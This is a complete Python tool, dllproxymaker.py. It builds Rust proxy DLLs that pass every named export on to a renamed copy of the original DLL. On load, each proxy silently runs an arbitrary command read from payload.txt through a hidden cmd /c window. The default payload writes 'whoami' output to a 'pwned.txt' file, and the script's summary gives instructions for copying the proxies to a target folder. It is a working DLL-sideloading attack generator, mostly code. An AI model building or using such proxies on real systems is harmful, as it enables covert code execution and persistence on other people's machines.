#!/usr/bin/env python3
"""
dllproxymaker.py — DLL proxy generator.

Generates, for each input DLL, a Rust proxy that forwards every named export
to a renamed copy of the original and executes a payload on load.

Usage:
    dllproxymaker.py <input> [output] [--payload CMD]
                     [--keep-going] [--skip LIST]

Output layout (per DLL):
    <output>/<name>.dll           -> proxy (Rust stubs)
    <output>/<name>_orig.dll      -> renamed original
    <output>/payload.txt          -> command executed on proxy load

Export discovery is performed with `pefile`. Compilation is delegated to
`cargo`/`rustc` using the target triple inferred from the original's PE
header, so that the proxy matches the architecture of the binary it
replaces.
"""

from __future__ import annotations

import argparse
import shutil
import subprocess
import sys
import tempfile
from pathlib import Path
from typing import Iterable, NamedTuple

try:
    import pefile
except ImportError:
    print("[!] Missing dependency: pefile. Install with: pip install pefile")
    sys.exit(1)


# ---------------------------------------------------------------------
#  Constants
# ---------------------------------------------------------------------

# PE machine types mapped to Rust target triples.
ARCH_MAP: dict[int, str] = {
    0x014C: "i686-pc-windows-msvc",      # x86
    0x8664: "x86_64-pc-windows-msvc",    # x64
    0xAA64: "aarch64-pc-windows-msvc",   # ARM64
}

DEFAULT_SKIP: tuple[str, ...] = ("api-ms-win-", "ext-ms-win-")
DEFAULT_PAYLOAD: str = r"whoami >> C:\Windows\Temp\pwned.txt"


# ---------------------------------------------------------------------
#  Templates
# ---------------------------------------------------------------------

CARGO_TOML_TEMPLATE = """\
[package]
name = "{pkg_name}"
version = "0.1.0"
edition = "2021"

[lib]
name = "proxy"
crate-type = ["cdylib"]

[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
strip = true
"""


LIB_RS_TEMPLATE = r"""// Auto-generated by dllproxymaker.py — do not edit by hand.
#![allow(non_snake_case)]
#![allow(dead_code)]
#![allow(unused_imports)]

use std::ffi::c_void;
use std::fs;
use std::os::windows::process::CommandExt;
use std::path::PathBuf;
use std::process::{Command, Stdio};
use std::sync::OnceLock;

type BOOL = i32;
type DWORD = u32;
type HINSTANCE = *mut c_void;
type LPVOID = *mut c_void;
type HMODULE = *mut c_void;
type FARPROC = *const c_void;
type LPCWSTR = *const u16;

const DLL_PROCESS_ATTACH: DWORD = 1;
const CREATE_NO_WINDOW: u32 = 0x0800_0000;

/// Filename of the renamed original DLL. Injected at generation time.
const ORIGINAL_DLL: &str = "__ORIGINAL_DLL__";

#[link(name = "kernel32")]
extern "system" {
    fn GetModuleFileNameW(h: HINSTANCE, buf: *mut u16, size: DWORD) -> DWORD;
    fn LoadLibraryW(name: LPCWSTR) -> HMODULE;
    fn GetProcAddress(h: HMODULE, name: *const u8) -> FARPROC;
}

static DLL_DIR: OnceLock<PathBuf> = OnceLock::new();
static ORIGINAL_HMODULE: OnceLock<usize> = OnceLock::new();

fn to_wide(s: &str) -> Vec<u16> {
    s.encode_utf16().chain(std::iter::once(0)).collect()
}

/// Loads (once) the original DLL and returns its HMODULE.
fn original_module() -> HMODULE {
    let h = *ORIGINAL_HMODULE.get_or_init(|| unsafe {
        let dir = DLL_DIR.get().cloned().unwrap_or_else(|| PathBuf::from("."));
        let full = dir.join(ORIGINAL_DLL);
        let w = to_wide(&full.to_string_lossy());
        LoadLibraryW(w.as_ptr()) as usize
    });
    h as HMODULE
}

/// Resolves a function pointer from the original DLL.
/// `name` must be NUL-terminated.
unsafe fn resolve(name: &[u8]) -> FARPROC {
    GetProcAddress(original_module(), name.as_ptr())
}

/// Reads payload.txt from the DLL's directory and runs its contents
/// through `cmd /c`. Non-blocking: `Command::spawn` returns immediately.
fn run_payload(dir: &PathBuf) {
    let payload_path = dir.join("payload.txt");
    let Ok(cmd) = fs::read_to_string(&payload_path) else {
        return;
    };
    let cmd = cmd.trim();
    if cmd.is_empty() {
        return;
    }
    let _ = Command::new("cmd.exe")
        .arg("/c")
        .raw_arg(cmd)
        .creation_flags(CREATE_NO_WINDOW)
        .stdin(Stdio::null())
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn();
}

#[no_mangle]
pub extern "system" fn DllMain(
    hinst: HINSTANCE,
    reason: DWORD,
    _reserved: LPVOID,
) -> BOOL {
    if reason == DLL_PROCESS_ATTACH {
        // Record this DLL's directory so we can locate the original
        // and its payload file later.
        unsafe {
            let mut buf = [0u16; 512];
            let n = GetModuleFileNameW(hinst, buf.as_mut_ptr(), 512);
            if n > 0 {
                let path = String::from_utf16_lossy(&buf[..n as usize]);
                if let Some(parent) = PathBuf::from(&path).parent() {
                    let _ = DLL_DIR.set(parent.to_path_buf());
                }
            }
        }

        if let Some(dir) = DLL_DIR.get() {
            run_payload(dir);
        }
    }
    1 // TRUE
}

// =====================================================================
//  Generated stubs (one per export)
// =====================================================================
__STUBS__
"""


STUB_TEMPLATE = r"""
#[export_name = "{export_name_escaped}"]
pub extern "system" fn __stub_{idx}(
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize,
    a6: usize, a7: usize, a8: usize, a9: usize, a10: usize,
) -> usize {{
    unsafe {{
        let f = resolve(b"{export_name_escaped}\0");
        if f.is_null() {{
            return 0;
        }}
        let f: extern "system" fn(
            usize, usize, usize, usize, usize,
            usize, usize, usize, usize, usize,
        ) -> usize = std::mem::transmute(f);
        f(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10)
    }}
}}
"""


# ---------------------------------------------------------------------
#  Data structures
# ---------------------------------------------------------------------

class DllInfo(NamedTuple):
    path: Path
    name: str
    exports: list[str]
    ordinal_only: int
    target: str


class Result(NamedTuple):
    name: str
    reason: str


# ---------------------------------------------------------------------
#  CLI
# ---------------------------------------------------------------------

def _sanitise_pkg_name(base: str) -> str:
    """Cargo package names must be valid Rust identifiers.
    Keep ASCII alphanumerics, dash and underscore; replace the rest."""
    out = []
    for ch in base:
        if ch.isascii() and (ch.isalnum() or ch in "-_"):
            out.append(ch)
        else:
            out.append("_")
    name = "proxy_" + "".join(out)
    # Cargo also disallows a leading digit after the prefix is stripped,
    # but our "proxy_" prefix guarantees it starts with a letter.
    return name

def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Generate Rust-based DLL proxies that forward exports "
                    "and execute a payload on load.",
    )
    parser.add_argument(
        "input",
        help="DLL file or directory containing original DLLs",
    )
    parser.add_argument(
        "output",
        nargs="?",
        default=None,
        help="Output directory or DLL path (default: same folder as input)",
    )
    parser.add_argument(
        "--payload",
        default=DEFAULT_PAYLOAD,
        help=f"Command executed when a proxy loads (default: {DEFAULT_PAYLOAD!r})",
    )
    parser.add_argument(
        "--skip",
        default=",".join(DEFAULT_SKIP),
        help="Comma-separated list of substrings; matching DLLs are skipped",
    )
    parser.add_argument(
        "--keep-going",
        action="store_true",
        help="Continue processing remaining DLLs when one fails",
    )
    return parser.parse_args()


# ---------------------------------------------------------------------
#  PE inspection
# ---------------------------------------------------------------------

def inspect_dll(path: Path) -> DllInfo:
    """
    Parse the PE header to extract the target architecture and the list
    of named exports. Ordinal-only exports are counted but not forwarded.
    """
    pe = pefile.PE(str(path), fast_load=True)
    try:
        machine = pe.FILE_HEADER.Machine
        target = ARCH_MAP.get(machine)
        if target is None:
            raise ValueError(f"Unsupported architecture: 0x{machine:X}")

        pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
        )

        named: list[str] = []
        ordinal_only = 0

        if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
            for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                if exp.name:
                    named.append(exp.name.decode("utf-8", "replace"))
                else:
                    ordinal_only += 1
    finally:
        pe.close()

    return DllInfo(
        path=path,
        name=path.name,
        exports=named,
        ordinal_only=ordinal_only,
        target=target,
    )


# ---------------------------------------------------------------------
#  Code generation
# ---------------------------------------------------------------------

def escape_rust_string(value: str) -> str:
    """Escape a string for inclusion in a Rust `"..."` literal."""
    out: list[str] = []
    for ch in value:
        code = ord(ch)
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif 0x20 <= code < 0x7F:
            out.append(ch)
        else:
            out.append(f"\\x{code:02x}")
    return "".join(out)


def render_stubs(exports: Iterable[str]) -> str:
    """Render the Rust stub block for the given export names."""
    blocks: list[str] = []
    for idx, name in enumerate(exports):
        blocks.append(
            STUB_TEMPLATE.format(
                idx=idx,
                export_name_escaped=escape_rust_string(name),
            )
        )
    return "".join(blocks) if blocks else "// (no exports: DllMain only)\n"


def render_lib_rs(original_dll_name: str, exports: Iterable[str]) -> str:
    """Compose the full `lib.rs` source for a proxy."""
    return (
        LIB_RS_TEMPLATE
        .replace("__ORIGINAL_DLL__", escape_rust_string(original_dll_name))
        .replace("__STUBS__", render_stubs(exports))
    )


# ---------------------------------------------------------------------
#  Cargo project handling
# ---------------------------------------------------------------------

def prepare_project(workdir: Path, dll_name: str, lib_rs: str) -> Path:
    """Create a minimal Cargo crate under `workdir/<base>/`."""
    base = dll_name[:-4]  # strip ".dll"
    proj = workdir / base
    if proj.exists():
        shutil.rmtree(proj)
    (proj / "src").mkdir(parents=True)

    pkg_name = _sanitise_pkg_name(base) 

    (proj / "Cargo.toml").write_text(
        CARGO_TOML_TEMPLATE.format(pkg_name=f"proxy_{pkg_name}"),
        encoding="utf-8",
    )
    (proj / "src" / "lib.rs").write_text(lib_rs, encoding="utf-8")
    return proj


def build_project(proj: Path, target: str) -> Path:
    """
    Run `cargo build --release --target <target>` and return the path
    to the resulting proxy DLL.
    """
    result = subprocess.run(
        ["cargo", "build", "--release", "--target", target],
        cwd=proj,
        capture_output=True,
        encoding="utf-8",
        errors="replace",
    )

    if result.returncode != 0:
        print("[!] cargo build failed:")
        print(result.stdout or "")
        print(result.stderr or "")
        raise RuntimeError("cargo build failed")

    release_dir = proj / "target" / target / "release"
    proxy = release_dir / "proxy.dll"
    if not proxy.exists():
        candidates = list(release_dir.glob("*.dll"))
        if not candidates:
            raise RuntimeError(f"No compiled .dll found under {release_dir}")
        proxy = candidates[0]
    return proxy


# ---------------------------------------------------------------------
#  Orchestration
# ---------------------------------------------------------------------

def should_skip(name: str, skips: Iterable[str]) -> str | None:
    """Return the reason for skipping, or None if the DLL should be processed."""
    lower = name.lower()
    if lower.endswith("_orig.dll"):
        return "already a _orig.dll"
    for needle in skips:
        if needle in lower:
            return f"matches skip pattern ({needle})"
    return None


def process_one(
    dll_path: Path,
    out_dir: Path,
    workroot: Path,
    dest_name: str | None = None,
) -> DllInfo:
    """
    Inspect, generate and build a single proxy. Returns the DllInfo of
    the processed DLL. Raises on failure.
    """
    info = inspect_dll(dll_path)

    print(f"[*] {info.name}: {len(info.exports)} named exports, "
          f"{info.ordinal_only} ordinal-only, target={info.target}")
    if info.ordinal_only:
        print(f"    [!] {info.ordinal_only} ordinal-only exports will not be forwarded")

    proxy_name = dest_name or info.name
    base = Path(proxy_name).stem
    original_name = f"{base}_orig.dll"

    lib_rs = render_lib_rs(original_name, info.exports)
    project = prepare_project(workroot, info.name, lib_rs)
    built_proxy = build_project(project, info.target)

    (out_dir / original_name).write_bytes(dll_path.read_bytes())
    shutil.copy2(built_proxy, out_dir / proxy_name)

    print(f"    [+] OK -> {proxy_name} + {original_name}")
    return info


def print_summary(
    ok: list[str],
    skipped: list[Result],
    failed: list[Result],
    out_dir: Path,
) -> None:
    print("\n========== SUMMARY ==========")
    print(f"Succeeded: {len(ok)}")
    print(f"Skipped:   {len(skipped)}")
    print(f"Failed:    {len(failed)}")

    if skipped:
        print("\nSkipped:")
        for item in skipped:
            print(f"  - {item.name}: {item.reason}")
    if failed:
        print("\nFailed:")
        for item in failed:
            print(f"  - {item.name}: {item.reason}")

    print(f"\n[+] Output directory: {out_dir}")
    print("[+] Deploy by copying *.{dll} and payload.txt to the target folder")
    print("[+] Reminder: payload.txt must sit alongside the DLLs at runtime")


def resolve_io(input_path: Path, output: str | None, ext: str):
    """Return (files, out_dir, dest_name). dest_name is set only for a single output file."""
    if input_path.is_file():
        if input_path.suffix.lower() != ext:
            raise ValueError(f"Input file must be a {ext}: {input_path}")
        files = [input_path]
        default_dir = input_path.parent
    elif input_path.is_dir():
        files = sorted(input_path.glob(f"*{ext}"))
        default_dir = input_path
    else:
        raise FileNotFoundError(f"Input does not exist: {input_path}")

    dest_name = None
    if not output:
        return files, default_dir, None

    dest = Path(output)
    if dest.exists() and dest.is_dir():
        return files, dest.resolve(), None
    if dest.suffix.lower() == ext:
        if len(files) != 1:
            raise ValueError("Output file is only valid when processing a single input file")
        dest = dest.resolve()
        dest.parent.mkdir(parents=True, exist_ok=True)
        return files, dest.parent, dest.name

    return files, dest.resolve(), None


def main() -> int:
    args = parse_args()

    try:
        dlls, out_dir, dest_name = resolve_io(
            Path(args.input).resolve(), args.output, ".dll"
        )
    except (FileNotFoundError, ValueError) as exc:
        print(f"[!] {exc}")
        return 1

    out_dir.mkdir(parents=True, exist_ok=True)

    skips = tuple(s.strip().lower() for s in args.skip.split(",") if s.strip())

    (out_dir / "payload.txt").write_text(args.payload + "\n", encoding="utf-8")
    print(f"[+] payload.txt written to {out_dir}")

    print(f"[+] {len(dlls)} DLL(s) to process")

    workroot = Path(tempfile.mkdtemp(prefix="dllproxy_"))
    print(f"[+] Temporary workspace: {workroot}\n")

    succeeded: list[str] = []
    skipped: list[Result] = []
    failed: list[Result] = []

    for dll_path in dlls:
        reason = should_skip(dll_path.name, skips)
        if reason is not None:
            skipped.append(Result(dll_path.name, reason))
            continue

        try:
            info = process_one(dll_path, out_dir, workroot, dest_name)
            succeeded.append(info.name)
        except Exception as exc:
            failed.append(Result(dll_path.name, str(exc)))
            print(f"    [!] FAILED: {exc}")
            if not args.keep_going:
                print("[!] Aborting (use --keep-going to continue)")
                break

    print_summary(succeeded, skipped, failed, out_dir)
    return 0 if not failed else 2


if __name__ == "__main__":
    sys.exit(main())